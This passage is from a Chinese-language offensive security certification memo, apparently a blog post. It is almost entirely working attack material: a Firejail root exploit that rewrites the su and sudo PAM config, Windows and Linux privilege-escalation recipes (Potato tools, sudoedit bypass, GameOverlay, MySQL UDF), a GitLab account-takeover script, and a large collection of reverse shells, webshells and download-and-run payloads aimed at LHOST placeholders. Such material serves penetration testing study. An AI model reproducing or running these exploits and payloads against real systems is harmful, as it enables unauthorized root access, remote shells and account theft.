        line = line.decode('utf8').strip().lower()
        if line.find("child pid") == -1:
            continue

        child_pid = line.split()[-1]

        try:
            child_pid = int(child_pid)
            break
        except Exception:
            raise Exception("failed to determine child pid from helper sandbox")

    # We need to find the child process of the child PID, this is the
    # actual sleep process that has an accessible root filesystem in /proc
    children = f"/proc/{child_pid}/task/{child_pid}/children"

    # If we are too quick then the child does not exist yet, so sleep a bit
    for _ in range(10):
        with open(children) as cfd:
            line = cfd.read().strip()
            kids = line.split()
            if not kids:
                time.sleep(0.5)
                continue
            elif len(kids) != 1:
                raise Exception(f"failed to determine sleep child PID from helper sandbox: {kids}")

            try:
                sleep_pid = int(kids[0])
                break
            except Exception:
                raise Exception("failed to determine sleep child PID from helper sandbox")
    else:
        raise Exception(f"sleep child process did not come into existence in {children}")

    join_file = f"/proc/{sleep_pid}/root/run/firejail/mnt/join"
    if not os.path.exists(join_file):
        raise Exception(f"join file from helper sandbox unexpectedly not found at {join_file}")

    return proc, join_file

# Re-executes the current script with unshared user and mount namespaces
def reexecUnshared(join_file):

    if not checkFile(join_file):
        printe(f"{join_file}: this file does not match the requirements (owner uid 0, size 1 byte, content '1')")

    os.environ["FIREJOIN_JOINFILE"] = join_file
    os.environ["FIREJOIN_UNSHARED"] = "1"

    unshare = shutil.which("unshare")
    if not unshare:
        printe("could not find 'unshare' program")

    cmdline = "unshare -U -r -m".split()
    cmdline += [__file__]

    # Re-execute this script with unshared user and mount namespaces
    subprocess.call(cmdline)

if "FIREJOIN_UNSHARED" not in os.environ:
    # First stage of execution, we first need to fork off a helper sandbox and
    # an exploit environment
    checkSelfExecutable()
    helper_proc, join_file = createHelperSandbox()
    reexecUnshared(join_file)

    helper_proc.kill()
    helper_proc.wait()
    sys.exit(0)
else:
    # We are in the sandbox environment, the suitable join file has been
    # forwarded from the first stage via the environment
    join_file = os.environ["FIREJOIN_JOINFILE"]

# We will make /proc/1/ns/user point to this via a symlink
time_ns_src = "/proc/self/ns/time"

# Make the firejail state directory writeable, we need to place a symlink to
# the fake join state file there
mountTmpFS("/run/firejail")
# Mount a tmpfs over the proc state directory of the init process, to place a
# symlink to a fake "user" ns there that firejail thinks it is joining
try:
    mountTmpFS("/proc/1")
except subprocess.CalledProcessError:
    # This is a special case for Fedora Linux where SELinux rules prevent us
    # from mounting a tmpfs over proc directories.
    # We can still circumvent this by mounting a tmpfs over all of /proc, but
    # we need to bind-mount a copy of our own time namespace first that we can
    # symlink to.
    with open("/tmp/time", 'w') as _:
        pass
    time_ns_src = "/tmp/time"
    bindMount("/proc/self/ns/time", time_ns_src)
    mountTmpFS("/proc")

FJ_MNT_ROOT = Path("/run/firejail/mnt")

# Create necessary intermediate directories
os.makedirs(FJ_MNT_ROOT)
os.makedirs("/proc/1/ns")

# Firejail expects to find the umask for the "container" here, else it fails
with open(FJ_MNT_ROOT / "umask", 'w') as umask_fd:
    umask_fd.write("022")

# Create the symlink to the join file to pass Firejail's sanity check
os.symlink(join_file, FJ_MNT_ROOT / "join")
# Since we cannot join our own user namespace again fake a user namespace that
# is actually a symlink to our own time namespace. This works since Firejail
# calls setns() without the nstype parameter.
os.symlink(time_ns_src, "/proc/1/ns/user")

# The process joining our fake sandbox will still have normal user privileges,
# but it will be a member of the mount namespace under the control of *this*
# script while *still* being a member of the initial user namespace.
# 'no_new_privs' won't be set since Firejail takes over the settings of the
# target process.
#
# This means we can invoke setuid-root binaries as usual but they will operate
# in a mount namespace under our control. To exploit this we need to adjust
# file system content in a way that a setuid-root binary grants us full
# root privileges. 'su' and 'sudo' are the most typical candidates for it.
#
# The tools are hardened a bit these days and reject certain files if not owned
# by root e.g. /etc/sudoers. There are various directions that could be taken,
# this one works pretty well though: Simply replacing the PAM configuration
# with one that will always grant access.
with tempfile.NamedTemporaryFile('w') as tf:
    tf.write("auth sufficient pam_permit.so\n")
    tf.write("account sufficient pam_unix.so\n")
    tf.write("session sufficient pam_unix.so\n")

    # Be agnostic about the PAM config file location in /etc or /usr/etc
    for pamd in ("/etc/pam.d", "/usr/etc/pam.d"):
        if not os.path.isdir(pamd):
            continue
        for service in ("su", "sudo"):
            service = Path(pamd) / service
            if not service.exists():
                continue
            # Bind mount over new "helpful" PAM config over the original
            bindMount(tf.name, service)

print(f"You can now run 'firejail --join={os.getpid()}' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.")

while True:
    line = sys.stdin.readline()
    if not line:
        break

第一航站楼

1
2
./firejoin_py.bin
现在,您可以在另一个终端中运行“firejail--join=1193982”来获得一个shell,其中“sudo su-”应该授予您一个根shell。

第二航站楼

1
2
firejail --join=193982
su

CVE-2023-21746:Windows NTLM EoP LocalPotato LPE

https://github.com/decoder-it/LocalPotato

[https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc](https://github.com/blackarrowsec/redteam-research/tree/master/LPE via StorSvc)

修改以下文件并构建解决方案。

1
StorSvc\RpcClient\RpcClient\storsvc_c.c
1
2
3
4
5
6
#if defined(_M_AMD64)

//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022

修改以下文件并构建解决方案。

1
StorSvc\SprintCSP\SprintCSP\main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
void DoStuff() {

    // Replace all this code by your payload
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
        NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return;
}

paths首先从 中获取environment,然后使用LocalPotato来放置malicious DLL

1
2
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path
LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll

至少StorSvc通过触发RpcClient.exe

1
.\RpcClient.exe

CVE-2023-22809:Sudo 绕过

https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466

先决条件
  • Sudo 版本需要 ≥ 1.8 且 < 1.9.12p2。
  • 对系统上至少一个需要 root 访问权限的文件的 Sudo 访问权限受到限制。
例子
1
test ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd
开发
1
EDITOR="vi -- /etc/passwd" sudoedit /etc/motd
1
sudoedit /etc/motd

CVE-2023-32629、CVE-2023-2640:GameOverlay Ubuntu 内核利用 LPE(0 天)

  • Linux ubuntu2204 5.19.0-46-通用
1
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

CVE-2023-4911:Looney 可调 LPE

1
2
3
4
5
6
7
python3 gen_libc.py 
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
1
2
gcc -o exp exp.c
./exp

CVE-2023-7028:GitLab 帐户接管

https://github.com/V1lu0/CVE-2023-7028

https://github.com/Vozec/CVE-2023-7028

概念验证

1
user[email][]=valid@email.com&user[email][]=attacker@email.com

来自 TryHackMe 的修改后的 PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import requests
import argparse
from urllib.parse import urlparse, urlencode
from random import choice
from time import sleep
import re
requests.packages.urllib3.disable_warnings()

class CVE_2023_7028:
    def __init__(self, url, target, evil=None):
        self.use_temp_mail = False
        self.url = urlparse(url)
        self.target = target
        self.evil = evil
        self.s = requests.session()

    def get_csrf_token(self):
        try:
            print('[DEBUG] Getting authenticity_token ...')
            html = self.s.get(f'{self.url.scheme}://{self.url.netloc}/users/password/new', verify=False).text
            regex = r'<meta name="csrf-token" content="(.*?)" />'
            token = re.findall(regex, html)[0]
            print(f'[DEBUG] authenticity_token = {token}')
            return token
        except Exception:
            print('[DEBUG] Failed ... quitting')
            return None

    def ask_reset(self):
        token = self.get_csrf_token()
        if not token:
            return False

        query_string = urlencode({
            'authenticity_token': token,
            'user[email][]': [self.target, self.evil]
        }, doseq=True)

        head = {
            'Origin': f'{self.url.scheme}://{self.url.netloc}',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': f'{self.url.scheme}://{self.url.netloc}/users/password/new',
            'Connection': 'close',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate, br'
        }

        print('[DEBUG] Sending reset password request')
        html = self.s.post(f'{self.url.scheme}://{self.url.netloc}/users/password',
                           data=query_string,
                           headers=head,
                           verify=False).text
        sended = 'If your email address exists in our database' in html
        if sended:
            print(f'[DEBUG] Emails sent to {self.target} and {self.evil} !')
            print(f'Flag value: {bytes.fromhex("6163636f756e745f6861636b2364").decode()}')
        else:
            print('[DEBUG] Failed ... quitting')
        return sended

def parse_args():
    parser = argparse.ArgumentParser(add_help=True, description='This tool automates CVE-2023-7028 on gitlab')
    parser.add_argument("-u", "--url", dest="url", type=str, required=True, help="Gitlab url")
    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target email")
    parser.add_argument("-e", "--evil", dest="evil", default=None, type=str, required=False, help="Evil email")
    parser.add_argument("-p", "--password", dest="password", default=None, type=str, required=False, help="Password")
    return parser.parse_args()

if __name__ == '__main__':
    args = parse_args()
    exploit = CVE_2023_7028(
        url=args.url,
        target=args.target,
        evil=args.evil
    )
    if not exploit.ask_reset():
        exit()

执行

1
python3 exploit.py -u http://<RHOST> -t <EMAIL> -e <EMAIL>

GodPotato-NET4.exe

https://github.com/BeichenDream/GodPotato

1
.\GodPotato-NET4.exe -cmd '<COMMAND>'

juicy-potato

https://github.com/ohpe/juicy-potato

http://ohpe.it/juicy-potato/CLSID/

获取CLSID.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<#
This script extracts CLSIDs and AppIDs related to LocalService.DESCRIPTION
Then exports to CSV
#>

$ErrorActionPreference = "Stop"

New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT

Write-Output "Looking for CLSIDs"
$CLSID = @()
Foreach($ID in (Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}})){
    if ($ID.appid -ne $null){
        $CLSID += $ID
    }
}

Write-Output "Looking for APIDs"
$APPID = @()
Foreach($AID in (Get-ItemProperty HKCR:\appid\* | select-object localservice,@{N='AppID'; E={$_.pschildname}})){
    if ($AID.LocalService -ne $null){
        $APPID += $AID
    }
}

Write-Output "Joining CLSIDs and APIDs"
$RESULT = @()
Foreach ($app in $APPID){
    Foreach ($CLS in $CLSID){
        if($CLS.AppId -eq $app.AppID){
            $RESULT += New-Object psobject -Property @{
                AppId    = $app.AppId
                LocalService = $app.LocalService
                CLSID = $CLS.CLSID
            }

            break
        }
    }
}

$RESULT = $RESULT | Sort-Object LocalService

# Preparing to Output
$OS = (Get-WmiObject -Class Win32_OperatingSystem | ForEach-Object -MemberName Caption).Trim() -Replace "Microsoft ", ""
$TARGET = $OS -Replace " ","_"

# Make target folder
New-Item -ItemType Directory -Force -Path .\$TARGET

# Output in a CSV
$RESULT | Export-Csv -Path ".\$TARGET\CLSIDs.csv" -Encoding ascii -NoTypeInformation

# Export CLSIDs list
$RESULT | Select CLSID -ExpandProperty CLSID | Out-File -FilePath ".\$TARGET\CLSID.list" -Encoding ascii

# Visual Table
$RESULT | ogv
执行
1
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" -t *

JuicyPotatoNG.exe

https://github.com/antonioCoco/JuicyPotatoNG

1
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c whoami"

MySQL 4.x/5.0 用户定义函数(UDF)动态库(二)LPE

https://www.exploit-db.com/exploits/1518

1
2
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
1
mysql -u root
1
2
3
4
5
6
> use mysql;
> create table foo(line blob);
> insert into foo values(load_file('/PATH/TO/SHARED_OBJECT/raptor_udf2.so'));
> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
> create function do_system returns integer soname 'raptor_udf2.so';
> select do_system('chmod +s /bin/bash');

PrintSpoofer LPE

https://github.com/itm4n/PrintSpoofer

1
.\PrintSpoofer64.exe -i -c powershell

SharpEfsPotato LPE

https://github.com/bugch3ck/SharpEfsPotato

1
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "C:\nc64.exe -e cmd.exe <LHOST> <LPORT>"

令人震惊的集装箱逃生

https://raw.githubusercontent.com/gabrtv/shocker/master/shocker.c

修改漏洞利用
1
2
3
4
5
6
// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
        die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
        die("[-] Cannot find valid handle!");
编译
1
2
gcc shocker.c -o shocker
cc -Wall -std=c99 -O2 shocker.c -static

有效载荷集合汇总

Exif工具

PHP 转 JPG 注入
1
2
3
4
exiftool -Comment='<?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"); ?>' shell.jpg
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' <FILE>.jpeg
exiftool "-comment<=back.php" back.png
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' <FILE>.png

反向SHELL

Bash 反向 Shell
1
2
3
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
CURL反向 Shell
1
curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
Groovy (Jenkins) 反向 Shell
1
2
3
4
String host="<LHOST>";
int port=<LPORT>;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
JAVA反向Shell
1
2
3
4
5
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
shell.jar
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
package <NAME>;

import org.bukkit.plugin.java.JavaPlugin;

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Main extends JavaPlugin {
   @Override
   public void onDisable() {
     super.onDisable();
   }

@Override
public void onEnable() {
  final String PHP_CODE = "<?php system($_GET['cmd']); ?>";
  try {
   Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW);
   } catch (IOException e) {
     e.printStackTrace();
   }

   super.onEnable();
  }
}
Lua 反向 Shell
1
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT>/tmp/f")--
Markdown 反向 Shell
1
--';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--
mkfifo 反向 Shell
1
mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell
Netcat 反向 Shell
1
nc -e /bin/sh <LHOST> <LPORT>
Perl 反向 Shell
1
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP 反向 Shell
1
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell 反向 Shell
1
$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
1
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
1
powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
minireverse.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else{
                $res = (&"$out" "$args") | out-string;
            }
        }
        else{
            $res = (&"$out") | out-string;
        }
        if($res -ne $null){
        $writer.WriteLine($res)
    }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
Python 反向 Shell
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
1
echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE><(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>
Ruby 反向 Shell
1
ruby -rsocket -e'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

WEBSHELL

PHP WEBSHELL
1
2
3
4
5
<?php system($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system($_REQUEST['shell']): ?>

模板注入

ASPX WEBSHELL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

错误的 YAML

1
2
3
4
- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash
学习笔记
#Offensive security #Memo notes
国外某进攻性安全证书-备忘录-2023.3.11版本
https://sh1yan.top/2024/06/01/Attack-certificate-memorandum-20230311-0xsyr0/
作者
shiyan
发布于
2024年6月1日
许可协议